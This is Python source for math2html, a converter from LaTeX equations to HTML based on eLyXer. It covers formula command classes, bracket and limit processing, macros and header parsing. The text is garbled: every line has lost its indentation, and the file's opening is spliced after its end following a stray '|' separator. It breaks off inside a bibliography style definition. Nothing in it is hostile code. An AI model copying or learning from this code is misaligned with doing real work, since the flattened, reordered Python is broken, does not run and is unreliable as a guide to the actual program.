if command.startswith('\\up'):
upcommand = '\\' + command[3:]
elif pos.checkskip('\\Up'):
upcommand = '\\' + command[3:4].upper() + command[4:]
else:
Trace.error('Impossible upgreek command: ' + command)
return
upgreek = self.parsewithcommand(upcommand, pos)
if upgreek:
upgreek.type = 'font'
return upgreek
class CommandBit(FormulaCommand):
"A formula bit that includes a command"
def setcommand(self, command):
"Set the command in the bit"
self.command = command
if self.commandmap:
self.original += command
self.translated = self.commandmap[self.command]
def parseparameter(self, pos):
"Parse a parameter at the current position"
self.factory.clearskipped(pos)
if pos.finished():
return None
parameter = self.factory.parseany(pos)
self.add(parameter)
return parameter
def parsesquare(self, pos):
"Parse a square bracket"
self.factory.clearskipped(pos)
if not self.factory.detecttype(SquareBracket, pos):
return None
bracket = self.factory.parsetype(SquareBracket, pos)
self.add(bracket)
return bracket
def parseliteral(self, pos):
"Parse a literal bracket."
self.factory.clearskipped(pos)
if not self.factory.detecttype(Bracket, pos):
if not pos.isvalue():
Trace.error('No literal parameter found at: ' + pos.identifier())
return None
return pos.globvalue()
bracket = Bracket().setfactory(self.factory)
self.add(bracket.parseliteral(pos))
return bracket.literal
def parsesquareliteral(self, pos):
"Parse a square bracket literally."
self.factory.clearskipped(pos)
if not self.factory.detecttype(SquareBracket, pos):
return None
bracket = SquareBracket().setfactory(self.factory)
self.add(bracket.parseliteral(pos))
return bracket.literal
def parsetext(self, pos):
"Parse a text parameter."
self.factory.clearskipped(pos)
if not self.factory.detecttype(Bracket, pos):
Trace.error('No text parameter for ' + self.command)
return None
bracket = Bracket().setfactory(self.factory).parsetext(pos)
self.add(bracket)
return bracket
class EmptyCommand(CommandBit):
"An empty command (without parameters)"
commandmap = FormulaConfig.commands
def parsebit(self, pos):
"Parse a command without parameters"
self.contents = [FormulaConstant(self.translated)]
class SpacedCommand(CommandBit):
"An empty command which should have math spacing in formulas."
commandmap = FormulaConfig.spacedcommands
def parsebit(self, pos):
"Place as contents the command translated and spaced."
self.contents = [FormulaConstant(u' ' + self.translated + u' ')]
class AlphaCommand(EmptyCommand):
"A command without paramters whose result is alphabetical"
commandmap = FormulaConfig.alphacommands
def parsebit(self, pos):
"Parse the command and set type to alpha"
EmptyCommand.parsebit(self, pos)
self.type = 'alpha'
class OneParamFunction(CommandBit):
"A function of one parameter"
commandmap = FormulaConfig.onefunctions
simplified = False
def parsebit(self, pos):
"Parse a function with one parameter"
self.output = TaggedOutput().settag(self.translated)
self.parseparameter(pos)
self.simplifyifpossible()
def simplifyifpossible(self):
"Try to simplify to a single character."
if self.original in self.commandmap:
self.output = FixedOutput()
self.html = [self.commandmap[self.original]]
self.simplified = True
class SymbolFunction(CommandBit):
"Find a function which is represented by a symbol (like _ or ^)"
commandmap = FormulaConfig.symbolfunctions
def detect(self, pos):
"Find the symbol"
return pos.current() in SymbolFunction.commandmap
def parsebit(self, pos):
"Parse the symbol"
self.setcommand(pos.current())
pos.skip(self.command)
self.output = TaggedOutput().settag(self.translated)
self.parseparameter(pos)
class TextFunction(CommandBit):
"A function where parameters are read as text."
commandmap = FormulaConfig.textfunctions
def parsebit(self, pos):
"Parse a text parameter"
self.output = TaggedOutput().settag(self.translated)
self.parsetext(pos)
def process(self):
"Set the type to font"
self.type = 'font'
class LabelFunction(CommandBit):
"A function that acts as a label"
commandmap = FormulaConfig.labelfunctions
def parsebit(self, pos):
"Parse a literal parameter"
self.key = self.parseliteral(pos)
def process(self):
"Add an anchor with the label contents."
self.type = 'font'
self.label = Label().create(' ', self.key, type = 'eqnumber')
self.contents = [self.label]
# store as a Label so we know it's been seen
Label.names[self.key] = self.label
class FontFunction(OneParamFunction):
"A function of one parameter that changes the font"
commandmap = FormulaConfig.fontfunctions
def process(self):
"Simplify if possible using a single character."
self.type = 'font'
self.simplifyifpossible()
FormulaFactory.types += [FormulaCommand, SymbolFunction]
FormulaCommand.types = [
AlphaCommand, EmptyCommand, OneParamFunction, FontFunction, LabelFunction,
TextFunction, SpacedCommand,
]
class BigSymbol(object):
"A big symbol generator."
symbols = FormulaConfig.bigsymbols
def __init__(self, symbol):
"Create the big symbol."
self.symbol = symbol
def getpieces(self):
"Get an array with all pieces."
if not self.symbol in self.symbols:
return [self.symbol]
if self.smalllimit():
return [self.symbol]
return self.symbols[self.symbol]
def smalllimit(self):
"Decide if the limit should be a small, one-line symbol."
if not DocumentParameters.displaymode:
return True
if len(self.symbols[self.symbol]) == 1:
return True
return Options.simplemath
class BigBracket(BigSymbol):
"A big bracket generator."
def __init__(self, size, bracket, alignment='l'):
"Set the size and symbol for the bracket."
self.size = size
self.original = bracket
self.alignment = alignment
self.pieces = None
if bracket in FormulaConfig.bigbrackets:
self.pieces = FormulaConfig.bigbrackets[bracket]
def getpiece(self, index):
"Return the nth piece for the bracket."
function = getattr(self, 'getpiece' + unicode(len(self.pieces)))
return function(index)
def getpiece1(self, index):
"Return the only piece for a single-piece bracket."
return self.pieces[0]
def getpiece3(self, index):
"Get the nth piece for a 3-piece bracket: parenthesis or square bracket."
if index == 0:
return self.pieces[0]
if index == self.size - 1:
return self.pieces[-1]
return self.pieces[1]
def getpiece4(self, index):
"Get the nth piece for a 4-piece bracket: curly bracket."
if index == 0:
return self.pieces[0]
if index == self.size - 1:
return self.pieces[3]
if index == (self.size - 1)/2:
return self.pieces[2]
return self.pieces[1]
def getcell(self, index):
"Get the bracket piece as an array cell."
piece = self.getpiece(index)
span = 'span class="bracket align-' + self.alignment + '"'
return TaggedBit().constant(piece, span)
def getcontents(self):
"Get the bracket as an array or as a single bracket."
if self.size == 1 or not self.pieces:
return self.getsinglebracket()
rows = []
for index in range(self.size):
cell = self.getcell(index)
rows.append(TaggedBit().complete([cell], 'span class="arrayrow"'))
return [TaggedBit().complete(rows, 'span class="array"')]
def getsinglebracket(self):
"Return the bracket as a single sign."
if self.original == '.':
return [TaggedBit().constant('', 'span class="emptydot"')]
return [TaggedBit().constant(self.original, 'span class="symbol"')]
class FormulaEquation(CommandBit):
"A simple numbered equation."
piece = 'equation'
def parsebit(self, pos):
"Parse the array"
self.output = ContentsOutput()
self.add(self.factory.parsetype(WholeFormula, pos))
class FormulaCell(FormulaCommand):
"An array cell inside a row"
def setalignment(self, alignment):
self.alignment = alignment
self.output = TaggedOutput().settag('span class="arraycell align-' + alignment +'"', True)
return self
def parsebit(self, pos):
self.factory.clearskipped(pos)
if pos.finished():
return
self.add(self.factory.parsetype(WholeFormula, pos))
class FormulaRow(FormulaCommand):
"An array row inside an array"
cellseparator = FormulaConfig.array['cellseparator']
def setalignments(self, alignments):
self.alignments = alignments
self.output = TaggedOutput().settag('span class="arrayrow"', True)
return self
def parsebit(self, pos):
"Parse a whole row"
index = 0
pos.pushending(self.cellseparator, optional=True)
while not pos.finished():
cell = self.createcell(index)
cell.parsebit(pos)
self.add(cell)
index += 1
pos.checkskip(self.cellseparator)
if len(self.contents) == 0:
self.output = EmptyOutput()
def createcell(self, index):
"Create the cell that corresponds to the given index."
alignment = self.alignments[index % len(self.alignments)]
return self.factory.create(FormulaCell).setalignment(alignment)
class MultiRowFormula(CommandBit):
"A formula with multiple rows."
def parserows(self, pos):
"Parse all rows, finish when no more row ends"
self.rows = []
first = True
for row in self.iteraterows(pos):
if first:
first = False
else:
# intersparse empty rows
self.addempty()
row.parsebit(pos)
self.addrow(row)
self.size = len(self.rows)
def iteraterows(self, pos):
"Iterate over all rows, end when no more row ends"
rowseparator = FormulaConfig.array['rowseparator']
while True:
pos.pushending(rowseparator, True)
row = self.factory.create(FormulaRow)
yield row.setalignments(self.alignments)
if pos.checkfor(rowseparator):
self.original += pos.popending(rowseparator)
else:
return
def addempty(self):
"Add an empty row."
row = self.factory.create(FormulaRow).setalignments(self.alignments)
for index, originalcell in enumerate(self.rows[-1].contents):
cell = row.createcell(index)
cell.add(FormulaConstant(u' '))
row.add(cell)
self.addrow(row)
def addrow(self, row):
"Add a row to the contents and to the list of rows."
self.rows.append(row)
self.add(row)
class FormulaArray(MultiRowFormula):
"An array within a formula"
piece = 'array'
def parsebit(self, pos):
"Parse the array"
self.output = TaggedOutput().settag('span class="array"', False)
self.parsealignments(pos)
self.parserows(pos)
def parsealignments(self, pos):
"Parse the different alignments"
# vertical
self.valign = 'c'
literal = self.parsesquareliteral(pos)
if literal:
self.valign = literal
# horizontal
literal = self.parseliteral(pos)
self.alignments = []
for l in literal:
self.alignments.append(l)
class FormulaMatrix(MultiRowFormula):
"A matrix (array with center alignment)."
piece = 'matrix'
def parsebit(self, pos):
"Parse the matrix, set alignments to 'c'."
self.output = TaggedOutput().settag('span class="array"', False)
self.valign = 'c'
self.alignments = ['c']
self.parserows(pos)
class FormulaCases(MultiRowFormula):
"A cases statement"
piece = 'cases'
def parsebit(self, pos):
"Parse the cases"
self.output = ContentsOutput()
self.alignments = ['l', 'l']
self.parserows(pos)
for row in self.contents:
for cell in row.contents:
cell.output.settag('span class="case align-l"', True)
cell.contents.append(FormulaConstant(u' '))
array = TaggedBit().complete(self.contents, 'span class="bracketcases"', True)
brace = BigBracket(len(self.contents), '{', 'l')
self.contents = brace.getcontents() + [array]
class EquationEnvironment(MultiRowFormula):
"A \\begin{}...\\end equation environment with rows and cells."
def parsebit(self, pos):
"Parse the whole environment."
self.output = TaggedOutput().settag('span class="environment"', False)
environment = self.piece.replace('*', '')
if environment in FormulaConfig.environments:
self.alignments = FormulaConfig.environments[environment]
else:
Trace.error('Unknown equation environment ' + self.piece)
self.alignments = ['l']
self.parserows(pos)
class BeginCommand(CommandBit):
"A \\begin{}...\\end command and what it entails (array, cases, aligned)"
commandmap = {FormulaConfig.array['begin']:''}
types = [FormulaEquation, FormulaArray, FormulaCases, FormulaMatrix]
def parsebit(self, pos):
"Parse the begin command"
command = self.parseliteral(pos)
bit = self.findbit(command)
ending = FormulaConfig.array['end'] + '{' + command + '}'
pos.pushending(ending)
bit.parsebit(pos)
self.add(bit)
self.original += pos.popending(ending)
self.size = bit.size
def findbit(self, piece):
"Find the command bit corresponding to the \\begin{piece}"
for type in BeginCommand.types:
if piece.replace('*', '') == type.piece:
return self.factory.create(type)
bit = self.factory.create(EquationEnvironment)
bit.piece = piece
return bit
FormulaCommand.types += [BeginCommand]
class CombiningFunction(OneParamFunction):
commandmap = FormulaConfig.combiningfunctions
def parsebit(self, pos):
"Parse a combining function."
self.type = 'alpha'
combining = self.translated
parameter = self.parsesingleparameter(pos)
if not parameter:
Trace.error('Empty parameter for combining function ' + self.command)
elif len(parameter.extracttext()) != 1:
Trace.error('Applying combining function ' + self.command + ' to invalid string "' + parameter.extracttext() + '"')
self.contents.append(Constant(combining))
def parsesingleparameter(self, pos):
"Parse a parameter, or a single letter."
self.factory.clearskipped(pos)
if pos.finished():
Trace.error('Error while parsing single parameter at ' + pos.identifier())
return None
if self.factory.detecttype(Bracket, pos) \
or self.factory.detecttype(FormulaCommand, pos):
return self.parseparameter(pos)
letter = FormulaConstant(pos.skipcurrent())
self.add(letter)
return letter
class DecoratingFunction(OneParamFunction):
"A function that decorates some bit of text"
commandmap = FormulaConfig.decoratingfunctions
def parsebit(self, pos):
"Parse a decorating function"
self.type = 'alpha'
symbol = self.translated
self.symbol = TaggedBit().constant(symbol, 'span class="symbolover"')
self.parameter = self.parseparameter(pos)
self.output = TaggedOutput().settag('span class="withsymbol"')
self.contents.insert(0, self.symbol)
self.parameter.output = TaggedOutput().settag('span class="undersymbol"')
self.simplifyifpossible()
class LimitCommand(EmptyCommand):
"A command which accepts limits above and below, in display mode."
commandmap = FormulaConfig.limitcommands
def parsebit(self, pos):
"Parse a limit command."
pieces = BigSymbol(self.translated).getpieces()
self.output = TaggedOutput().settag('span class="limits"')
for piece in pieces:
self.contents.append(TaggedBit().constant(piece, 'span class="limit"'))
class LimitPreviousCommand(LimitCommand):
"A command to limit the previous command."
commandmap = None
def parsebit(self, pos):
"Do nothing."
self.output = TaggedOutput().settag('span class="limits"')
self.factory.clearskipped(pos)
def __unicode__(self):
"Return a printable representation."
return 'Limit previous command'
if sys.version_info >= (3, 0):
__str__ = __unicode__
class LimitsProcessor(MathsProcessor):
"A processor for limits inside an element."
def process(self, contents, index):
"Process the limits for an element."
if Options.simplemath:
return
if self.checklimits(contents, index):
self.modifylimits(contents, index)
if self.checkscript(contents, index) and self.checkscript(contents, index + 1):
self.modifyscripts(contents, index)
def checklimits(self, contents, index):
"Check if the current position has a limits command."
if not DocumentParameters.displaymode:
return False
if self.checkcommand(contents, index + 1, LimitPreviousCommand):
self.limitsahead(contents, index)
return False
if not isinstance(contents[index], LimitCommand):
return False
return self.checkscript(contents, index + 1)
def limitsahead(self, contents, index):
"Limit the current element based on the next."
contents[index + 1].add(contents[index].clone())
contents[index].output = EmptyOutput()
def modifylimits(self, contents, index):
"Modify a limits commands so that the limits appear above and below."
limited = contents[index]
subscript = self.getlimit(contents, index + 1)
limited.contents.append(subscript)
if self.checkscript(contents, index + 1):
superscript = self.getlimit(contents, index + 1)
else:
superscript = TaggedBit().constant(u' ', 'sup class="limit"')
limited.contents.insert(0, superscript)
def getlimit(self, contents, index):
"Get the limit for a limits command."
limit = self.getscript(contents, index)
limit.output.tag = limit.output.tag.replace('script', 'limit')
return limit
def modifyscripts(self, contents, index):
"Modify the super- and subscript to appear vertically aligned."
subscript = self.getscript(contents, index)
# subscript removed so instead of index + 1 we get index again
superscript = self.getscript(contents, index)
scripts = TaggedBit().complete([superscript, subscript], 'span class="scripts"')
contents.insert(index, scripts)
def checkscript(self, contents, index):
"Check if the current element is a sub- or superscript."
return self.checkcommand(contents, index, SymbolFunction)
def checkcommand(self, contents, index, type):
"Check for the given type as the current element."
if len(contents) <= index:
return False
return isinstance(contents[index], type)
def getscript(self, contents, index):
"Get the sub- or superscript."
bit = contents[index]
bit.output.tag += ' class="script"'
del contents[index]
return bit
class BracketCommand(OneParamFunction):
"A command which defines a bracket."
commandmap = FormulaConfig.bracketcommands
def parsebit(self, pos):
"Parse the bracket."
OneParamFunction.parsebit(self, pos)
def create(self, direction, character):
"Create the bracket for the given character."
self.original = character
self.command = '\\' + direction
self.contents = [FormulaConstant(character)]
return self
class BracketProcessor(MathsProcessor):
"A processor for bracket commands."
def process(self, contents, index):
"Convert the bracket using Unicode pieces, if possible."
if Options.simplemath:
return
if self.checkleft(contents, index):
return self.processleft(contents, index)
def processleft(self, contents, index):
"Process a left bracket."
rightindex = self.findright(contents, index + 1)
if not rightindex:
return
size = self.findmax(contents, index, rightindex)
self.resize(contents[index], size)
self.resize(contents[rightindex], size)
def checkleft(self, contents, index):
"Check if the command at the given index is left."
return self.checkdirection(contents[index], '\\left')
def checkright(self, contents, index):
"Check if the command at the given index is right."
return self.checkdirection(contents[index], '\\right')
def checkdirection(self, bit, command):
"Check if the given bit is the desired bracket command."
if not isinstance(bit, BracketCommand):
return False
return bit.command == command
def findright(self, contents, index):
"Find the right bracket starting at the given index, or 0."
depth = 1
while index < len(contents):
if self.checkleft(contents, index):
depth += 1
if self.checkright(contents, index):
depth -= 1
if depth == 0:
return index
index += 1
return None
def findmax(self, contents, leftindex, rightindex):
"Find the max size of the contents between the two given indices."
sliced = contents[leftindex:rightindex]
return max([element.size for element in sliced])
def resize(self, command, size):
"Resize a bracket command to the given size."
character = command.extracttext()
alignment = command.command.replace('\\', '')
bracket = BigBracket(size, character, alignment)
command.output = ContentsOutput()
command.contents = bracket.getcontents()
class TodayCommand(EmptyCommand):
"Shows today's date."
commandmap = None
def parsebit(self, pos):
"Parse a command without parameters"
self.output = FixedOutput()
self.html = [datetime.date.today().strftime('%b %d, %Y')]
FormulaCommand.types += [
DecoratingFunction, CombiningFunction, LimitCommand, BracketCommand,
]
FormulaProcessor.processors += [
LimitsProcessor(), BracketProcessor(),
]
class ParameterDefinition(object):
"The definition of a parameter in a hybrid function."
"[] parameters are optional, {} parameters are mandatory."
"Each parameter has a one-character name, like {$1} or {$p}."
"A parameter that ends in ! like {$p!} is a literal."
"Example: [$1]{$p!} reads an optional parameter $1 and a literal mandatory parameter p."
parambrackets = [('[', ']'), ('{', '}')]
def __init__(self):
self.name = None
self.literal = False
self.optional = False
self.value = None
self.literalvalue = None
def parse(self, pos):
"Parse a parameter definition: [$0], {$x}, {$1!}..."
for (opening, closing) in ParameterDefinition.parambrackets:
if pos.checkskip(opening):
if opening == '[':
self.optional = True
if not pos.checkskip('$'):
Trace.error('Wrong parameter name, did you mean $' + pos.current() + '?')
return None
self.name = pos.skipcurrent()
if pos.checkskip('!'):
self.literal = True
if not pos.checkskip(closing):
Trace.error('Wrong parameter closing ' + pos.skipcurrent())
return None
return self
Trace.error('Wrong character in parameter template: ' + pos.skipcurrent())
return None
def read(self, pos, function):
"Read the parameter itself using the definition."
if self.literal:
if self.optional:
self.literalvalue = function.parsesquareliteral(pos)
else:
self.literalvalue = function.parseliteral(pos)
if self.literalvalue:
self.value = FormulaConstant(self.literalvalue)
elif self.optional:
self.value = function.parsesquare(pos)
else:
self.value = function.parseparameter(pos)
def __unicode__(self):
"Return a printable representation."
result = 'param ' + self.name
if self.value:
result += ': ' + unicode(self.value)
else:
result += ' (empty)'
return result
if sys.version_info >= (3, 0):
__str__ = __unicode__
class ParameterFunction(CommandBit):
"A function with a variable number of parameters defined in a template."
"The parameters are defined as a parameter definition."
def readparams(self, readtemplate, pos):
"Read the params according to the template."
self.params = dict()
for paramdef in self.paramdefs(readtemplate):
paramdef.read(pos, self)
self.params['$' + paramdef.name] = paramdef
def paramdefs(self, readtemplate):
"Read each param definition in the template"
pos = TextPosition(readtemplate)
while not pos.finished():
paramdef = ParameterDefinition().parse(pos)
if paramdef:
yield paramdef
def getparam(self, name):
"Get a parameter as parsed."
if not name in self.params:
return None
return self.params[name]
def getvalue(self, name):
"Get the value of a parameter."
return self.getparam(name).value
def getliteralvalue(self, name):
"Get the literal value of a parameter."
param = self.getparam(name)
if not param or not param.literalvalue:
return None
return param.literalvalue
class HybridFunction(ParameterFunction):
"""
A parameter function where the output is also defined using a template.
The template can use a number of functions; each function has an associated
tag.
Example: [f0{$1},span class="fbox"] defines a function f0 which corresponds
to a span of class fbox, yielding <span class="fbox">$1</span>.
Literal parameters can be used in tags definitions:
[f0{$1},span style="color: $p;"]
yields <span style="color: $p;">$1</span>, where $p is a literal parameter.
Sizes can be specified in hybridsizes, e.g. adding parameter sizes. By
default the resulting size is the max of all arguments. Sizes are used
to generate the right parameters.
A function followed by a single / is output as a self-closing XHTML tag:
[f0/,hr]
will generate <hr/>.
"""
commandmap = FormulaConfig.hybridfunctions
def parsebit(self, pos):
"Parse a function with [] and {} parameters"
readtemplate = self.translated[0]
writetemplate = self.translated[1]
self.readparams(readtemplate, pos)
self.contents = self.writeparams(writetemplate)
self.computehybridsize()
def writeparams(self, writetemplate):
"Write all params according to the template"
return self.writepos(TextPosition(writetemplate))
def writepos(self, pos):
"Write all params as read in the parse position."
result = []
while not pos.finished():
if pos.checkskip('$'):
param = self.writeparam(pos)
if param:
result.append(param)
elif pos.checkskip('f'):
function = self.writefunction(pos)
if function:
function.type = None
result.append(function)
elif pos.checkskip('('):
result.append(self.writebracket('left', '('))
elif pos.checkskip(')'):
result.append(self.writebracket('right', ')'))
else:
result.append(FormulaConstant(pos.skipcurrent()))
return result
def writeparam(self, pos):
"Write a single param of the form $0, $x..."
name = '$' + pos.skipcurrent()
if not name in self.params:
Trace.error('Unknown parameter ' + name)
return None
if not self.params[name]:
return None
if pos.checkskip('.'):
self.params[name].value.type = pos.globalpha()
return self.params[name].value
def writefunction(self, pos):
"Write a single function f0,...,fn."
tag = self.readtag(pos)
if not tag:
return None
if pos.checkskip('/'):
# self-closing XHTML tag, such as <hr/>
return TaggedBit().selfcomplete(tag)
if not pos.checkskip('{'):
Trace.error('Function should be defined in {}')
return None
pos.pushending('}')
contents = self.writepos(pos)
pos.popending()
if len(contents) == 0:
return None
return TaggedBit().complete(contents, tag)
def readtag(self, pos):
"Get the tag corresponding to the given index. Does parameter substitution."
if not pos.current().isdigit():
Trace.error('Function should be f0,...,f9: f' + pos.current())
return None
index = int(pos.skipcurrent())
if 2 + index > len(self.translated):
Trace.error('Function f' + unicode(index) + ' is not defined')
return None
tag = self.translated[2 + index]
if not '$' in tag:
return tag
for variable in self.params:
if variable in tag:
param = self.params[variable]
if not param.literal:
Trace.error('Parameters in tag ' + tag + ' should be literal: {' + variable + '!}')
continue
if param.literalvalue:
value = param.literalvalue
else:
value = ''
tag = tag.replace(variable, value)
return tag
def writebracket(self, direction, character):
"Return a new bracket looking at the given direction."
return self.factory.create(BracketCommand).create(direction, character)
def computehybridsize(self):
"Compute the size of the hybrid function."
if not self.command in HybridSize.configsizes:
self.computesize()
return
self.size = HybridSize().getsize(self)
# set the size in all elements at first level
for element in self.contents:
element.size = self.size
class HybridSize(object):
"The size associated with a hybrid function."
configsizes = FormulaConfig.hybridsizes
def getsize(self, function):
"Read the size for a function and parse it."
sizestring = self.configsizes[function.command]
for name in function.params:
if name in sizestring:
size = function.params[name].value.computesize()
sizestring = sizestring.replace(name, unicode(size))
if '$' in sizestring:
Trace.error('Unconverted variable in hybrid size: ' + sizestring)
return 1
return eval(sizestring)
FormulaCommand.types += [HybridFunction]
class HeaderParser(Parser):
"Parses the LyX header"
def parse(self, reader):
"Parse header parameters into a dictionary, return the preamble."
contents = []
self.parseending(reader, lambda: self.parseline(reader, contents))
# skip last line
reader.nextline()
return contents
def parseline(self, reader, contents):
"Parse a single line as a parameter or as a start"
line = reader.currentline()
if line.startswith(HeaderConfig.parameters['branch']):
self.parsebranch(reader)
return
elif line.startswith(HeaderConfig.parameters['lstset']):
LstParser().parselstset(reader)
return
elif line.startswith(HeaderConfig.parameters['beginpreamble']):
contents.append(self.factory.createcontainer(reader))
return
# no match
self.parseparameter(reader)
def parsebranch(self, reader):
"Parse all branch definitions."
branch = reader.currentline().split()[1]
reader.nextline()
subparser = HeaderParser().complete(HeaderConfig.parameters['endbranch'])
subparser.parse(reader)
options = BranchOptions(branch)
for key in subparser.parameters:
options.set(key, subparser.parameters[key])
Options.branches[branch] = options
def complete(self, ending):
"Complete the parser with the given ending."
self.ending = ending
return self
class PreambleParser(Parser):
"A parser for the LyX preamble."
preamble = []
def parse(self, reader):
"Parse the full preamble with all statements."
self.ending = HeaderConfig.parameters['endpreamble']
self.parseending(reader, lambda: self.parsepreambleline(reader))
return []
def parsepreambleline(self, reader):
"Parse a single preamble line."
PreambleParser.preamble.append(reader.currentline())
reader.nextline()
class LstParser(object):
"Parse global and local lstparams."
globalparams = dict()
def parselstset(self, reader):
"Parse a declaration of lstparams in lstset."
paramtext = self.extractlstset(reader)
if not '{' in paramtext:
Trace.error('Missing opening bracket in lstset: ' + paramtext)
return
lefttext = paramtext.split('{')[1]
croppedtext = lefttext[:-1]
LstParser.globalparams = self.parselstparams(croppedtext)
def extractlstset(self, reader):
"Extract the global lstset parameters."
paramtext = ''
while not reader.finished():
paramtext += reader.currentline()
reader.nextline()
if paramtext.endswith('}'):
return paramtext
Trace.error('Could not find end of \\lstset settings; aborting')
def parsecontainer(self, container):
"Parse some lstparams from elyxer.a container."
container.lstparams = LstParser.globalparams.copy()
paramlist = container.getparameterlist('lstparams')
container.lstparams.update(self.parselstparams(paramlist))
def parselstparams(self, paramlist):
"Process a number of lstparams from elyxer.a list."
paramdict = dict()
for param in paramlist:
if not '=' in param:
if len(param.strip()) > 0:
Trace.error('Invalid listing parameter ' + param)
else:
key, value = param.split('=', 1)
paramdict[key] = value
return paramdict
class MacroDefinition(CommandBit):
"A function that defines a new command (a macro)."
macros = dict()
def parsebit(self, pos):
"Parse the function that defines the macro."
self.output = EmptyOutput()
self.parameternumber = 0
self.defaults = []
self.factory.defining = True
self.parseparameters(pos)
self.factory.defining = False
Trace.debug('New command ' + self.newcommand + ' (' + \
unicode(self.parameternumber) + ' parameters)')
self.macros[self.newcommand] = self
def parseparameters(self, pos):
"Parse all optional parameters (number of parameters, default values)"
"and the mandatory definition."
self.newcommand = self.parsenewcommand(pos)
# parse number of parameters
literal = self.parsesquareliteral(pos)
if literal:
self.parameternumber = int(literal)
# parse all default values
bracket = self.parsesquare(pos)
while bracket:
self.defaults.append(bracket)
bracket = self.parsesquare(pos)
# parse mandatory definition
self.definition = self.parseparameter(pos)
def parsenewcommand(self, pos):
"Parse the name of the new command."
self.factory.clearskipped(pos)
if self.factory.detecttype(Bracket, pos):
return self.parseliteral(pos)
if self.factory.detecttype(FormulaCommand, pos):
return self.factory.create(FormulaCommand).extractcommand(pos)
Trace.error('Unknown formula bit in defining function at ' + pos.identifier())
return 'unknown'
def instantiate(self):
"Return an instance of the macro."
return self.definition.clone()
class MacroParameter(FormulaBit):
"A parameter from elyxer.a macro."
def detect(self, pos):
"Find a macro parameter: #n."
return pos.checkfor('#')
def parsebit(self, pos):
"Parse the parameter: #n."
if not pos.checkskip('#'):
Trace.error('Missing parameter start #.')
return
self.number = int(pos.skipcurrent())
self.original = '#' + unicode(self.number)
self.contents = [TaggedBit().constant('#' + unicode(self.number), 'span class="unknown"')]
class MacroFunction(CommandBit):
"A function that was defined using a macro."
commandmap = MacroDefinition.macros
def parsebit(self, pos):
"Parse a number of input parameters."
self.output = FilteredOutput()
self.values = []
macro = self.translated
self.parseparameters(pos, macro)
self.completemacro(macro)
def parseparameters(self, pos, macro):
"Parse as many parameters as are needed."
self.parseoptional(pos, list(macro.defaults))
self.parsemandatory(pos, macro.parameternumber - len(macro.defaults))
if len(self.values) < macro.parameternumber:
Trace.error('Missing parameters in macro ' + unicode(self))
def parseoptional(self, pos, defaults):
"Parse optional parameters."
optional = []
while self.factory.detecttype(SquareBracket, pos):
optional.append(self.parsesquare(pos))
if len(optional) > len(defaults):
break
for value in optional:
default = defaults.pop()
if len(value.contents) > 0:
self.values.append(value)
else:
self.values.append(default)
self.values += defaults
def parsemandatory(self, pos, number):
"Parse a number of mandatory parameters."
for index in range(number):
parameter = self.parsemacroparameter(pos, number - index)
if not parameter:
return
self.values.append(parameter)
def parsemacroparameter(self, pos, remaining):
"Parse a macro parameter. Could be a bracket or a single letter."
"If there are just two values remaining and there is a running number,"
"parse as two separater numbers."
self.factory.clearskipped(pos)
if pos.finished():
return None
if self.factory.detecttype(FormulaNumber, pos):
return self.parsenumbers(pos, remaining)
return self.parseparameter(pos)
def parsenumbers(self, pos, remaining):
"Parse the remaining parameters as a running number."
"For example, 12 would be {1}{2}."
number = self.factory.parsetype(FormulaNumber, pos)
if not len(number.original) == remaining:
return number
for digit in number.original:
value = self.factory.create(FormulaNumber)
value.add(FormulaConstant(digit))
value.type = number
self.values.append(value)
return None
def completemacro(self, macro):
"Complete the macro with the parameters read."
self.contents = [macro.instantiate()]
replaced = [False] * len(self.values)
for parameter in self.searchall(MacroParameter):
index = parameter.number - 1
if index >= len(self.values):
Trace.error('Macro parameter index out of bounds: ' + unicode(index))
return
replaced[index] = True
parameter.contents = [self.values[index].clone()]
for index in range(len(self.values)):
if not replaced[index]:
self.addfilter(index, self.values[index])
def addfilter(self, index, value):
"Add a filter for the given parameter number and parameter value."
original = '#' + unicode(index + 1)
value = ''.join(self.values[0].gethtml())
self.output.addfilter(original, value)
class FormulaMacro(Formula):
"A math macro defined in an inset."
def __init__(self):
self.parser = MacroParser()
self.output = EmptyOutput()
def __unicode__(self):
"Return a printable representation."
return 'Math macro'
if sys.version_info >= (3, 0):
__str__ = __unicode__
FormulaFactory.types += [ MacroParameter ]
FormulaCommand.types += [
MacroFunction,
]
def math2html(formula):
"Convert some TeX math to HTML."
factory = FormulaFactory()
whole = factory.parseformula(formula)
FormulaProcessor().process(whole)
whole.process()
return ''.join(whole.gethtml())
def main():
"Main function, called if invoked from elyxer.the command line"
args = sys.argv
Options().parseoptions(args)
if len(args) != 1:
Trace.error('Usage: math2html.py escaped_string')
exit()
result = math2html(args[0])
Trace.message(result)
if __name__ == '__main__':
main()
| #! /usr/bin/env python
# -*- coding: utf-8 -*-
# math2html: convert LaTeX equations to HTML output.
#
# Copyright (C) 2009-2011 Alex Fernández
#
# Released under the terms of the `2-Clause BSD license'_, in short:
# Copying and distribution of this file, with or without modification,
# are permitted in any medium without royalty provided the copyright
# notice and this notice are preserved.
# This file is offered as-is, without any warranty.
#
# .. _2-Clause BSD license: http://www.spdx.org/licenses/BSD-2-Clause
# Based on eLyXer: convert LyX source files to HTML output.
# http://alexfernandez.github.io/elyxer/
# --end--
# Alex 20101110
# eLyXer standalone formula conversion to HTML.
import codecs
import datetime
import gettext
import io
import os.path
import sys
import unicodedata
if sys.version_info >= (3, 0):
from urllib.parse import quote_plus
else:
from urllib import quote_plus
if sys.version_info >= (3, 0):
unicode = str #noqa
basestring = str # noqa
file = io.IOBase # noqa
class Trace(object):
"A tracing class"
debugmode = False
quietmode = False
showlinesmode = False
prefix = None
def debug(cls, message):
"Show a debug message"
if not Trace.debugmode or Trace.quietmode:
return
Trace.show(message, sys.stdout)
def message(cls, message):
"Show a trace message"
if Trace.quietmode:
return
if Trace.prefix and Trace.showlinesmode:
message = Trace.prefix + message
Trace.show(message, sys.stdout)
def error(cls, message):
"Show an error message"
message = '* ' + message
if Trace.prefix and Trace.showlinesmode:
message = Trace.prefix + message
Trace.show(message, sys.stderr)
def fatal(cls, message):
"Show an error message and terminate"
Trace.error('FATAL: ' + message)
exit(-1)
def show(cls, message, channel):
"Show a message out of a channel"
if sys.version_info < (3, 0):
message = message.encode('utf-8')
channel.write(message + '\n')
debug = classmethod(debug)
message = classmethod(message)
error = classmethod(error)
fatal = classmethod(fatal)
show = classmethod(show)
class BibStylesConfig(object):
"Configuration class from elyxer.config file"
abbrvnat = {
u'@article': u'$authors. $title. <i>$journal</i>,{ {$volume:}$pages,} $month $year.{ doi: $doi.}{ URL <a href="$url">$url</a>.}{ $note.}',
